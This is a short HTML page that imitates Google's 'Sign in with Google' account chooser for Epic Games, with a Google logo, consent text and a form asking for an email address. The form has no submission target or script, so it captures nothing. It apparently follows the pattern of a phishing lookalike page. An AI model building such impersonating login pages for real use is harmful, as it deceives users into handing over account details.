<!DOCTYPE html>
	
	<html>
		
		<head>
			
			<title>/Redirect/GOOGLE_LogIn/</title>
			
			<link rel="stylesheet" type="text/css" href="stylme2.css">
			
		</head>
		
		<body>
			
			<div id="footg">
				
				<img src="googlogo.png" alt="google_logo" id="golo"><p>Sign In with Google</p>
			
			</div>
			
			<div id="space"><p style="font-size:30px;">Choose an account</p><br><p>to continue to</p><p style="color:blue"><b>Epic Games .Inc</b></p></div>
			
			<div id="gform">
				
				<form name="aform">
					
					<label for="email">Email Address:</label>
					<input type="text" id="mail" class="pun" name="mail">
					
					<br><br>
					
					<p id="p4">To continue Google will share your name, email address, language, preference and profile picture with Epic Games Inc.. Before using this app, you can review Epic Games inc's <a href="privpo.html">Privacy policy</a> and <a href="termservice.html">Terms of Service</a></p>
					
					<br><br>
					
				</form>
			
			</div>
		
		</body>
	
	</html>